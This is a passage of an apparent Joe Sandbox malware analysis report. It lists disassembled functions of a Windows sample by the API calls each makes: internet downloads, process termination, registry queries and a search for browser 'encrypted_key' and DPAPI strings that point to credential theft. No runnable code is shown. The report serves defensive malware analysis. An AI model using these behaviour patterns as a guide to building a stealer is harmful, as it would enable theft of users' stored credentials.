                                  • memcmp.MSVCRT(?,v20,00000003), ref: 003E9E04
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 003E9E42
                                  • LocalAlloc.KERNEL32(00000040), ref: 003E9EA7
                                    • Part of subcall function 004071E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004071FE
                                  • lstrcpy.KERNEL32(00000000,00414C48), ref: 003E9FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocal
                                  • String ID: @$v10$v20
                                  • API String ID: 102826412-278772428
                                  • Opcode ID: f74fc6a6846db552b30b241aa14e14098265674427198fe6de7edb47bbfc2d00
                                  • Instruction ID: 8d9dde2cab3a76811459da86a8a29b2ffba0b8a35c741af93d11a4316eec1b19
                                  • Opcode Fuzzy Hash: f74fc6a6846db552b30b241aa14e14098265674427198fe6de7edb47bbfc2d00
                                  • Instruction Fuzzy Hash: E151C132A102699BCB12EF66DC41BDE77A8AF44315F154236F909EB281DBB0ED518BD0
                                  Function 003E5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003E565A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E5661
                                  • InternetOpenA.WININET(0040CFEC,00000000,00000000,00000000,00000000), ref: 003E5677
                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 003E5692
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003E56BC
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 003E56E1
                                  • InternetCloseHandle.WININET(?), ref: 003E56FA
                                  • InternetCloseHandle.WININET(00000000), ref: 003E5701
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: 5f72df4e5335ef41dac79fcf5fa96272ef23702d70ca140699ec3ab7b1d00a8d
                                  • Instruction ID: b34ec542afb362f1e91886898543b81da226c076c8b1a11999ef50f0e726c0db
                                  • Opcode Fuzzy Hash: 5f72df4e5335ef41dac79fcf5fa96272ef23702d70ca140699ec3ab7b1d00a8d
                                  • Instruction Fuzzy Hash: 3E41D130A00215EFDB15CF55DC88F9AB7B5FF48705F19C16AE9089B2D0D7719941CBA4
                                  Function 00404740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00404759
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00404769
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0040477B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040479C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004047AB
                                  • CloseHandle.KERNEL32(00000000), ref: 004047B2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 004047C0
                                  • CloseHandle.KERNEL32(00000000), ref: 004047CB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 187d78a2ccb52423784780adf889e363b3a58083fbe433c5fdbbabebaf087c68
                                  • Instruction ID: 7919b0eb3ed874933f987fb57d2012bef17d72db5a85f93ded8426bc286c9be9
                                  • Opcode Fuzzy Hash: 187d78a2ccb52423784780adf889e363b3a58083fbe433c5fdbbabebaf087c68
                                  • Instruction Fuzzy Hash: 1F01B9B15012146FE7205B709C89FEB77BDEB88752F045196FA09E21C0DF748D808AA5
                                  Function 003F83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003F8435
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F846C
                                  • lstrlen.KERNEL32(00000000), ref: 003F84B2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F84E9
                                  • lstrlen.KERNEL32(00000000), ref: 003F84FF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F852E
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003F853E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 2da1691ed43cd865383d306e8aced3d1146adc7abd85f16c580d35ddf6369a31
                                  • Instruction ID: 321f863323b0c4610dd2ce09facf99831a9f7f009f33787c1e188f10badddf15
                                  • Opcode Fuzzy Hash: 2da1691ed43cd865383d306e8aced3d1146adc7abd85f16c580d35ddf6369a31
                                  • Instruction Fuzzy Hash: 3D51D67590020A9FCB2ADF29D884AABB7F9EF49700F158459ED49DB245EF30E941CB50
                                  Function 00402910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00402925
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040292C
                                  • RegOpenKeyExA.ADVAPI32(80000002,0119BDD8,00000000,00020119,004028A9), ref: 0040294B
                                  • RegQueryValueExA.ADVAPI32(004028A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00402965
                                  • RegCloseKey.ADVAPI32(004028A9), ref: 0040296F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: d9e07dcb660df9c9326f0dfe88f53e7ff8ccf5b30fd62a1aa1577cfa2f387660
                                  • Instruction ID: 6ffa8155fc11c599d146f08e3747a76b64a36ace29df36605fc667696f7ef80e
                                  • Opcode Fuzzy Hash: d9e07dcb660df9c9326f0dfe88f53e7ff8ccf5b30fd62a1aa1577cfa2f387660
                                  • Instruction Fuzzy Hash: A901B1B5A00215AFD310CBA49C59FEB7BADEB48755F14405AFE45E7280EA715A0487A0
                                  Function 00402880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00402895
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040289C
                                    • Part of subcall function 00402910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00402925
                                    • Part of subcall function 00402910: RtlAllocateHeap.NTDLL(00000000), ref: 0040292C
                                    • Part of subcall function 00402910: RegOpenKeyExA.ADVAPI32(80000002,0119BDD8,00000000,00020119,004028A9), ref: 0040294B
                                    • Part of subcall function 00402910: RegQueryValueExA.ADVAPI32(004028A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00402965
                                    • Part of subcall function 00402910: RegCloseKey.ADVAPI32(004028A9), ref: 0040296F
                                  • RegOpenKeyExA.ADVAPI32(80000002,0119BDD8,00000000,00020119,003F9500), ref: 004028D1
                                  • RegQueryValueExA.ADVAPI32(003F9500,011B0220,00000000,00000000,00000000,000000FF), ref: 004028EC
                                  • RegCloseKey.ADVAPI32(003F9500), ref: 004028F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 8e4fa726842a08e5f2b7e304ef5c1b1b9231aacae58639f3739fe7c5ee5afc01
                                  • Instruction ID: b400b914118ff7a921336c6dc396952341439da07d132354f2dcb7c6c888f3a1
                                  • Opcode Fuzzy Hash: 8e4fa726842a08e5f2b7e304ef5c1b1b9231aacae58639f3739fe7c5ee5afc01
                                  • Instruction Fuzzy Hash: C501F775A00208BFD710DBA4AC4DFEA772EEB44306F04815AFE08D3280DA705A4087A0
                                  Function 003E71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 003E723E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 003E7279
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E7280
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 003E72C3
                                  • HeapFree.KERNEL32(00000000), ref: 003E72CA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 003E7329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                  • String ID:
                                  • API String ID: 174687898-0
                                  • Opcode ID: b36fc0178240e35832194b55d56e6c90237617275f1d119547b17f995700946f
                                  • Instruction ID: 782ad69e4ae83d48d43478e5dbce53eaa487c9f630c62978b6965670c351f22d
                                  • Opcode Fuzzy Hash: b36fc0178240e35832194b55d56e6c90237617275f1d119547b17f995700946f
                                  • Instruction Fuzzy Hash: 7B4181757047469BDB61CF6ADC84BAAB3E9FB88305F144669ED4DC7380E631E900DB90
                                  Function 003FD7B0 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 003FD7D6
                                  • RegOpenKeyExA.ADVAPI32(80000001,011AF398,00000000,00020119,?), ref: 003FD7F5
                                  • RegQueryValueExA.ADVAPI32(?,011B0580,00000000,00000000,00000000,000000FF), ref: 003FD819
                                  • RegCloseKey.ADVAPI32(?), ref: 003FD823
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FD848
                                  • lstrcat.KERNEL32(?,011B0598), ref: 003FD85C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 4513de290ddfa56a345dbbe430ce1fa955256eafd2886b5874f932c9b424e445
                                  • Instruction ID: 9099811b27ef0198ef615017ba795d86d9bb67772a3790874aa4883c9e252a0e
                                  • Opcode Fuzzy Hash: 4513de290ddfa56a345dbbe430ce1fa955256eafd2886b5874f932c9b424e445
                                  • Instruction Fuzzy Hash: 02418271A1025C9FCB55EF64EC86BDE777AAB44304F008165B6099B291EF30AA89CFD1
                                  Function 003E9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 003E9CA8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003E9CDA
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003E9D03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2746078483-738592651
                                  • Opcode ID: c319d50b847eac4861e339e3607eb2fc1d8e40d8aecb95b6a9d5656e671dbd6b
                                  • Instruction ID: 61878cee859f12e1b5a93f661257bbabb7a24c724194d4b9a60f64140746d33f
                                  • Opcode Fuzzy Hash: c319d50b847eac4861e339e3607eb2fc1d8e40d8aecb95b6a9d5656e671dbd6b
                                  • Instruction Fuzzy Hash: 9D41B372A002A99BCB23EF66DC417EF77B4AF54304F054666E915AB3D2DA70AD00C790
                                  Function 003FE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FEA24
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FEA53
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FEA61
                                  • lstrcat.KERNEL32(?,00411794), ref: 003FEA7A
                                  • lstrcat.KERNEL32(?,011A8958), ref: 003FEA8D
